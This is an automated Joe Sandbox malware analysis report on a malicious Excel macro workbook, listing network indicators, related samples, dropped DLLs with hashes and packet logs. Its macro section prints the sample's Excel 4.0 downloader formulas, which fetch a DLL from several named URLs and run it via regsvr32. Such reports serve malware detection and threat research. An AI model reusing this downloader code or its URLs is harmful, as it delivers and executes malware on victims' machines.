                              		60493FICOSA-ASEStrue
                              78.47.204.80
                              		unknownGermany
                              		24940HETZNER-ASDEtrue
                              118.98.72.86
                              		unknownIndonesia
                              		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                              212.64.200.154
                              		gymsportive.comTurkey
                              		12599ATLAS-ASTRtrue
                              37.44.244.177
                              		unknownGermany
                              		47583AS-HOSTINGERLTtrue
                              62.171.178.147
                              		unknownUnited Kingdom
                              		51167CONTABODEtrue
                              128.199.192.135
                              		unknownUnited Kingdom
                              		14061DIGITALOCEAN-ASNUStrue

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:581726
                              Start date:02.03.2022
                              Start time:16:41:20
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 11m 59s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:commenti_19265309.xlsm
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:18
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLSM@27/5@1/41
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 64.8% (good quality ratio 61.3%)
                              • Quality average: 76.4%
                              • Quality standard deviation: 27.1%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 76
                              • Number of non-executed functions: 240
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xlsm
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              16:41:31API Interceptor819x Sleep call for process: regsvr32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              207.148.81.119DETAILS-0203.xlsmGet hashmaliciousBrowse
                                NAgJT2i9xF.dllGet hashmaliciousBrowse
                                  NAgJT2i9xF.dllGet hashmaliciousBrowse
                                    Message-0203.xlsmGet hashmaliciousBrowse
                                      report_82218.xlsmGet hashmaliciousBrowse
                                        WWKF_532365.xlsmGet hashmaliciousBrowse
                                          LJWji3qxz9S2bhAgmf.dllGet hashmaliciousBrowse
                                            774-0203.xlsmGet hashmaliciousBrowse
                                              ydy_07285362.xlsmGet hashmaliciousBrowse
                                                Ruj7S46liw.dllGet hashmaliciousBrowse
                                                  jzi6GWIsyf.dllGet hashmaliciousBrowse
                                                    7D1C4ILkQI.dllGet hashmaliciousBrowse
                                                      45pz68iNQb.dllGet hashmaliciousBrowse
                                                        UQaf43fCX0.dllGet hashmaliciousBrowse
                                                          LNhXpzcQAu.dllGet hashmaliciousBrowse
                                                            9sZYpQ0vDv.dllGet hashmaliciousBrowse
                                                              9sZYpQ0vDv.dllGet hashmaliciousBrowse
                                                                0uzLmuwxoS.dllGet hashmaliciousBrowse
                                                                  QbFmj8SIim.dllGet hashmaliciousBrowse
                                                                    h80jibF7cc.dllGet hashmaliciousBrowse
                                                                      104.131.62.48DETAILS-0203.xlsmGet hashmaliciousBrowse
                                                                        NAgJT2i9xF.dllGet hashmaliciousBrowse
                                                                          NAgJT2i9xF.dllGet hashmaliciousBrowse
                                                                            Message-0203.xlsmGet hashmaliciousBrowse
                                                                              report_82218.xlsmGet hashmaliciousBrowse
                                                                                WWKF_532365.xlsmGet hashmaliciousBrowse
                                                                                  LJWji3qxz9S2bhAgmf.dllGet hashmaliciousBrowse
                                                                                    774-0203.xlsmGet hashmaliciousBrowse
                                                                                      ydy_07285362.xlsmGet hashmaliciousBrowse
                                                                                        Ruj7S46liw.dllGet hashmaliciousBrowse
                                                                                          jzi6GWIsyf.dllGet hashmaliciousBrowse
                                                                                            7D1C4ILkQI.dllGet hashmaliciousBrowse
                                                                                              45pz68iNQb.dllGet hashmaliciousBrowse
                                                                                                UQaf43fCX0.dllGet hashmaliciousBrowse
                                                                                                  LNhXpzcQAu.dllGet hashmaliciousBrowse
                                                                                                    9sZYpQ0vDv.dllGet hashmaliciousBrowse
                                                                                                      9sZYpQ0vDv.dllGet hashmaliciousBrowse
                                                                                                        0uzLmuwxoS.dllGet hashmaliciousBrowse
                                                                                                          QbFmj8SIim.dllGet hashmaliciousBrowse
                                                                                                            h80jibF7cc.dllGet hashmaliciousBrowse

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              gymsportive.comDETAILS-0203.xlsmGet hashmaliciousBrowse
                                                                                                              • 212.64.200.154
                                                                                                              Message-0203.xlsmGet hashmaliciousBrowse
                                                                                                              • 212.64.200.154

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              AS-CHOOPAUSDETAILS-0203.xlsmGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              NAgJT2i9xF.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              NAgJT2i9xF.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              Message-0203.xlsmGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              report_82218.xlsmGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              WWKF_532365.xlsmGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              LJWji3qxz9S2bhAgmf.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              774-0203.xlsmGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              ydy_07285362.xlsmGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              Ruj7S46liw.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              jzi6GWIsyf.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              7D1C4ILkQI.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              45pz68iNQb.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              UQaf43fCX0.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              LNhXpzcQAu.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              9sZYpQ0vDv.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              9sZYpQ0vDv.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              0uzLmuwxoS.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              QbFmj8SIim.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              h80jibF7cc.dllGet hashmaliciousBrowse
                                                                                                              • 66.42.57.149
                                                                                                              DIGITALOCEAN-ASNUSRlOx1RYwMeKbaxTlG4z3n5s1FKbBPaxQLCh.dllGet hashmaliciousBrowse
                                                                                                              • 178.128.83.165
                                                                                                              DETAILS-0203.xlsmGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135
                                                                                                              NAgJT2i9xF.dllGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135
                                                                                                              NAgJT2i9xF.dllGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135
                                                                                                              Message-0203.xlsmGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135
                                                                                                              report_82218.xlsmGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135
                                                                                                              Form.xlsmGet hashmaliciousBrowse
                                                                                                              • 178.128.83.165
                                                                                                              innovinc.org.xlsmGet hashmaliciousBrowse
                                                                                                              • 178.128.83.165
                                                                                                              RechnungScan_02_03_2022.xlsmGet hashmaliciousBrowse
                                                                                                              • 178.128.83.165
                                                                                                              WWKF_532365.xlsmGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135
                                                                                                              FFFbuild-12022-03-0211-20.exeGet hashmaliciousBrowse
                                                                                                              • 164.90.194.235
                                                                                                              LJWji3qxz9S2bhAgmf.dllGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135
                                                                                                              774-0203.xlsmGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135
                                                                                                              ydy_07285362.xlsmGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135
                                                                                                              2022-03-02_1703.xlsmGet hashmaliciousBrowse
                                                                                                              • 178.128.83.165
                                                                                                              2022-03-02_1706.xlsmGet hashmaliciousBrowse
                                                                                                              • 178.128.83.165
                                                                                                              Ruj7S46liw.dllGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135
                                                                                                              jzi6GWIsyf.dllGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135
                                                                                                              7D1C4ILkQI.dllGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135
                                                                                                              45pz68iNQb.dllGet hashmaliciousBrowse
                                                                                                              • 128.199.192.135

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              eb88d0b3e1961a0562f006e5ce2a0b87DETAILS-0203.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              Message-0203.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              report_82218.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              WWKF_532365.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              774-0203.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              PACK_73.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              10069385729969112736286.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              2022-03-02_1322.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              2022-03-02_0946.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              SCAN-01032022.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              Documents 8.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              NOTICE_003.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              SCAN 0103.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              DOCUMENTO_0103.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              info_0.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              INFO-8084.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              MAIL_0103.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              File_0103.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              Notice 28022022.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118
                                                                                                              MES_2602.xlsmGet hashmaliciousBrowse
                                                                                                              • 168.119.39.118

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Lg1r0mo1[1].dll

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):1028096
                                                                                                              Entropy (8bit):6.289681754051936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:+LDlVD0Fj+g1dEJgcIzQHBKeWZlQx5tFjNRLU:Ci6fgcIcHB8ZSbLU
                                                                                                              MD5:EC43B8038071C5ED84EC556990F1858C
                                                                                                              SHA1:CB8A7F5274987DAB12ECFB0DAA5699B1C145A513
                                                                                                              SHA-256:40C830C3E7DC753336FF2708DEEA882022608B8FEB571D732D07AFD1ED0A2C58
                                                                                                              SHA-512:608671479FCB4F32B62661EC0D7C8BC1238E6AA02448833E9D4C43AA1B9DFCD41B2F58DC309DE673BF16CCFAAD2FEABC3147CB64A30CB0AF8F059A5A54DD9E53
                                                                                                              Malicious:true
                                                                                                              IE Cache URL:http://gymsportive.com/0zwe/pSiUh/
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............nF..nF..nF9.1F..nF9.3F..nF..oF..nF.4.F..nF.4.Fv.nF.4.F[.nF.4.F..nF.4.F..nF..nF..nF.4.F..nFRich..nF........................PE..L....~.b...........!.....`..........'........p.......................................................................{...............P.......................P......................................w..@....................@..@....................text....P.......`.................. ..`.rdata..K....p.......p..............@..@.data............@..................@....idata...?.......@..................@....didat.......@......................@....rsrc........P......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\44EDD626.png

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:PNG image data, 2415 x 64, 8-bit/color RGB, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):29560
                                                                                                              Entropy (8bit):7.903149132963418
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:lzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+UW:JtT5fTR4Lh1NisFYBc3cr+UW
                                                                                                              MD5:5BAB80911CB5E910D18D366B360C7B4B
                                                                                                              SHA1:D40007FEC139A200DE1A3B84774C81AD28321B63
                                                                                                              SHA-256:E5191E67B0C6E3EA75AE1E6ED836B0124F21E16FD087B6C3475FD54E71B547D5
                                                                                                              SHA-512:46B338ECE9FDEB79EF3F5758F3433EB966D9149ED1C3F6BAAD48E76DB79DF24994294089D66B7AEE5BAC14366A4C7D3F98E17EBCBFBBA65B45B01EDD1597D2FC
                                                                                                              Malicious:false
                                                                                                              Preview:.PNG........IHDR...o...@........Q....sRGB.........gAMA......a.....pHYs..!...!........s.IDATx^.wX....].d$.....TT..1....s@E...`....s...0..vWWwM.k.?.w.W=......_=..#...5..U..vU...v.....................Q.&.................... .........................l"............................................x.&.................... .........................l"............................................x.......C..........!?.>-...A.....W.54W4.o..`.B......................s..6......ZY.p#.r.r...A.Kf.-.|.pbp!.w..e.K..-..R..ZW]L.Bo.......................?..j..6..d...Z..D.?K.v....N.._....m.........................'..O.&...v.*.X..2....K"b.iet...=........................6.m+#-...T..#.*&.*.x.,;..]+Ch.......................~.M...-&.60.[.$.1).pID..d.&......................~8?.&...z.Z..EB^.{..V|....L.....................?..h._4.E....J\z.<..V.........,.. J..../.."....................H~.M..`&.....f..Y....?|.......<......0.8+..."t\....................z..e..J.k#.&.X@!..b.........X.....&.J(.(x.[.7

                                                                                                              C:\Users\user\Desktop\~$commenti_19265309.xlsm

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):165
                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                              Malicious:true
                                                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                              C:\Users\user\sei.ocx

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1028096
                                                                                                              Entropy (8bit):6.289681754051936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:+LDlVD0Fj+g1dEJgcIzQHBKeWZlQx5tFjNRLU:Ci6fgcIcHB8ZSbLU
                                                                                                              MD5:EC43B8038071C5ED84EC556990F1858C
                                                                                                              SHA1:CB8A7F5274987DAB12ECFB0DAA5699B1C145A513
                                                                                                              SHA-256:40C830C3E7DC753336FF2708DEEA882022608B8FEB571D732D07AFD1ED0A2C58
                                                                                                              SHA-512:608671479FCB4F32B62661EC0D7C8BC1238E6AA02448833E9D4C43AA1B9DFCD41B2F58DC309DE673BF16CCFAAD2FEABC3147CB64A30CB0AF8F059A5A54DD9E53
                                                                                                              Malicious:true
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............nF..nF..nF9.1F..nF9.3F..nF..oF..nF.4.F..nF.4.Fv.nF.4.F[.nF.4.F..nF.4.F..nF..nF..nF.4.F..nFRich..nF........................PE..L....~.b...........!.....`..........'........p.......................................................................{...............P.......................P......................................w..@....................@..@....................text....P.......`.................. ..`.rdata..K....p.......p..............@..@.data............@..................@....idata...?.......@..................@....didat.......@......................@....rsrc........P......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................

                                                                                                              C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1028096
                                                                                                              Entropy (8bit):6.289681754051936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:+LDlVD0Fj+g1dEJgcIzQHBKeWZlQx5tFjNRLU:Ci6fgcIcHB8ZSbLU
                                                                                                              MD5:EC43B8038071C5ED84EC556990F1858C
                                                                                                              SHA1:CB8A7F5274987DAB12ECFB0DAA5699B1C145A513
                                                                                                              SHA-256:40C830C3E7DC753336FF2708DEEA882022608B8FEB571D732D07AFD1ED0A2C58
                                                                                                              SHA-512:608671479FCB4F32B62661EC0D7C8BC1238E6AA02448833E9D4C43AA1B9DFCD41B2F58DC309DE673BF16CCFAAD2FEABC3147CB64A30CB0AF8F059A5A54DD9E53
                                                                                                              Malicious:false
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............nF..nF..nF9.1F..nF9.3F..nF..oF..nF.4.F..nF.4.Fv.nF.4.F[.nF.4.F..nF.4.F..nF..nF..nF.4.F..nFRich..nF........................PE..L....~.b...........!.....`..........'........p.......................................................................{...............P.......................P......................................w..@....................@..@....................text....P.......`.................. ..`.rdata..K....p.......p..............@..@.data............@..................@....idata...?.......@..................@....didat.......@......................@....rsrc........P......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:Microsoft Excel 2007+
                                                                                                              Entropy (8bit):7.732822009162956
                                                                                                              TrID:
                                                                                                              • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                              • ZIP compressed archive (8000/1) 8.08%
                                                                                                              File name:commenti_19265309.xlsm
                                                                                                              File size:47652
                                                                                                              MD5:ea31d45aabef92c32f90ec8d5ee3fc88
                                                                                                              SHA1:16d18be1150fdde8d16c2cae9f92de453ca7342c
                                                                                                              SHA256:e287a83571ac14de139663276caeea8ee7c53db3c2c6660f9520d43ac0eb9985
                                                                                                              SHA512:d0fcaceef6e2d33617fa626e4ad2dc5fd7188a25e96592fd4ce0678c3ec222d1f05847b85d04160151c0462ff6c7d8ef239ce6ab39dfe0e33ce7695c4e273c2f
                                                                                                              SSDEEP:768:wdolODOevZCwrvtMezdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfNN/u:WoIDHtT5fTR4Lh1NisFYBc3cr+UqVfNw
                                                                                                              File Content Preview:PK..........!.5.x.....e.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                              File Icon

                                                                                                              Icon Hash:e4e2aa8aa4bcbcac

                                                                                                              Static OLE Info

                                                                                                              General

                                                                                                              Document Type:OpenXML
                                                                                                              Number of OLE Files:1

                                                                                                              OLE File "commenti_19265309.xlsm"

                                                                                                              Indicators
                                                                                                              Has Summary Info:
                                                                                                              Application Name:
                                                                                                              Encrypted Document:
                                                                                                              Contains Word Document Stream:
                                                                                                              Contains Workbook/Book Stream:
                                                                                                              Contains PowerPoint Document Stream:
                                                                                                              Contains Visio Document Stream:
                                                                                                              Contains ObjectPool Stream:
                                                                                                              Flash Objects Count:
                                                                                                              Contains VBA Macros:

                                                                                                              Macro 4.0 Code

                                                                                                              Name:Je1
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
                                                                                                              Je13False0Falsepre16,3,=CHAR("101")
                                                                                                              Name:Je2
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
                                                                                                              Je23False0Falsepost5,4,e
                                                                                                              Name:EFALGV
                                                                                                              Type:4
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
                                                                                                              EFALGV4False0Falsepost6,3,=FORMULA("e","e")=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gymsportive.com/0zwe/pSiUh/","..\sei.ocx",0,0)",D10)=FORMULA("=IF(GFGH1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://danialteb.com/wp-admin/NqRYgwPERRPoTs/","..\sei.ocx",0,0))",D12)=FORMULA("=IF(GFGH2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/IduhreKcPbD/","..\sei.ocx",0,0))",D14)=FORMULA("=IF(GFGH3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://skanev.com/wp-content/AT5Doj207guJES0BMk/","..\sei.ocx",0,0))",D16)=FORMULA("=IF(GFGH4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://praachichemfood.com/old-files==-/vo68ZI/","..\sei.ocx",0,0))",D18)=FORMULA("=IF(GFGH5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/","..\sei.ocx",0,0))",D20)=FORMULA("=IF(GFGH6<0, CLOSE(0),)",D22)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx")",D24)=FORMULA("=RETURN()",D33)9,3,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gymsportive.com/0zwe/pSiUh/","..\sei.ocx",0,0)11,3,=IF(GFGH1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://danialteb.com/wp-admin/NqRYgwPERRPoTs/","..\sei.ocx",0,0))13,3,=IF(GFGH2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/IduhreKcPbD/","..\sei.ocx",0,0))15,3,=IF(GFGH3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://skanev.com/wp-content/AT5Doj207guJES0BMk/","..\sei.ocx",0,0))17,3,=IF(GFGH4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://praachichemfood.com/old-files==-/vo68ZI/","..\sei.ocx",0,0))19,3,=IF(GFGH5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/","..\sei.ocx",0,0))21,3,=IF(GFGH6<0, CLOSE(0),)23,3,=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx")32,3,=RETURN()
                                                                                                              Name:EFALGV
                                                                                                              Type:4
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
                                                                                                              EFALGV4False0Falsepre6,3,=FORMULA("e",'Je2'!E6)=FORMULA("=CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://gymsportive.com/0zwe/pSiUh/","..\sei.ocx",0,0)",D10)=FORMULA("=IF(GFGH1<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://danialteb.com/wp-admin/NqRYgwPERRPoTs/","..\sei.ocx",0,0))",D12)=FORMULA("=IF(GFGH2<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://totalplaytuxtla.com/sitio/IduhreKcPbD/","..\sei.ocx",0,0))",D14)=FORMULA("=IF(GFGH3<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://skanev.com/wp-content/AT5Doj207guJES0BMk/","..\sei.ocx",0,0))",D16)=FORMULA("=IF(GFGH4<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://praachichemfood.com/old-files==-/vo68ZI/","..\sei.ocx",0,0))",D18)=FORMULA("=IF(GFGH5<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/","..\sei.ocx",0,0))",D20)=FORMULA("=IF(GFGH6<0, CLOSE(0),)",D22)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx")",D24)=FORMULA("=RETURN()",D33)
                                                                                                              Name:Je1
                                                                                                              Type:3
                                                                                                              Final:False
                                                                                                              Visible:False
                                                                                                              Protected:False
                                                                                                              Je13False0Falsepost16,3,=CHAR("101")

                                                                                                              Network Behavior

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Mar 2, 2022 16:42:19.845469952 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:19.904330015 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:19.904438972 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:19.905479908 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:19.981950045 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:19.981976986 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:19.981997967 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:19.982016087 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:19.982032061 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:19.982048035 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:19.982064962 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:19.982083082 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:19.982099056 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:19.982126951 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:19.982132912 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:19.982167006 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:19.982172012 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:19.993902922 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.040560007 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.040591955 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.040608883 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.040627003 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.040644884 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.040694952 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.040716887 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.040726900 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.040817976 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.041903019 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.042025089 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.042046070 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.042062044 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.042078018 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.042089939 CET4916580192.168.2.22212.64.200.154
